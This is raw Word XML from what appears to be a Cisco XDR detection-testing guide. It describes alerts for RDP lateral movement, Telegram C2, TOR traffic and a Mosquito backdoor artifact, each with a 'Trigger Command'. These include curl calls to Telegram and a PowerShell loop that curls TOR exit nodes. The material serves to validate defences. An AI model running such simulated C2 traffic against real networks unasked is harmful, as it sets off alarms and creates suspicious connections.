          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suspicious Endpoint Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE999EE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3031F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cisco NVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B96EC" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9D3B2" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Desktop Protocol (T1021.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB2629" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is disabled by default. Toggle the “Enabled” switch to turn it on in Alert settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3CC35" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EDFADF" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aunch Powershell and then run the following command, replacing &lt;ip-address&gt; with a host that has port 3389 open: mstsc /v:&lt;ip-address&gt;:3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BE3340" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC0E9DB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suspicious Request to Telegram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD83499" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A suspicious attempt to communicate with the Telegram chat service or the Telegraph blog service using the curl URL command-line tool. Adversaries have been known to use Telegram in this manner for C2 communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0466BAB6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suspicious Endpoint Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74158585" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B0425D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cisco NVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEEDE27" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD3518" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> One-Way Communication (T1102.003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657A92AA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is a cross-platform alert. It will run on Windows or Mac.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A595F66" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD8526" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl https://t.me/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D9EC61" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B4E1C75" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connection to TOR IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA67877" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Traffic to The Onion Router (TOR) IP address was detected. TOR has legitimate privacy preserving features when used on a personal device, but adversaries are known to leverage it for Command and Control traffic and defense evasion. Even if utilized by a legitimate user, it can circumvent some security controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73683D67" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suspicious Endpoint Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01087FE6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F4830" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cisco NVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512124AA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command and Control (TA0011), Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F888125" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Multi-hop Proxy (T1090.003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF5E28" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is a cross-platform alert. It will run on Windows or Mac.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585BE5CB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588B7E9A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl.exe -s https://check.torproject.org/exit-addresses | Select-Object -First 10 | Where-Object {$_ -match 'ExitAddress'} | ForEach-Object {$_ -replace '^ExitAddress\s+',''} | ForEach-Object {$_ -replace '\s+.*$',''} | foreach-object {curl.exe $_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A84BC53" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5139A8F3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C13423A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Endpoint Detection and Response Triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E07DA3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XDR Incident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3440DCDD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3765CD7F" w14:textId="27C6FD60" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="696927DB" wp14:editId="7DDDACCF">
            <wp:extent cx="5731510" cy="3137535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1029361471" name="Picture 16"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screenshot of a web pag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37535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789585A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0F5F05" w14:textId="6DD39E72" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="022ADB59" wp14:editId="4371BFF3">
            <wp:extent cx="5731510" cy="3534410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1772984862"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34410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BD12FE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8E5B64" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F54B8E3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cisco Secure Endpoint Triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3045A0BA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generate events for Behavioral Protection Engine and Cloud IOC Engines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33C540" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F23259B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726680CD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Mosquito File Artifact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61681BFA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7206280C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>A file artifact known to be associated with Mosquito malware was seen being created or modified on the system. Mosquito is a backdoor used by the Turla advanced persistent threat (APT) group also known as Snake or Uroboros. Mosquito is distributed via fake adobe flash installers and leverages google cloud infrastructure to evade detection.</w:t>
      </w:r>
    </w:p>
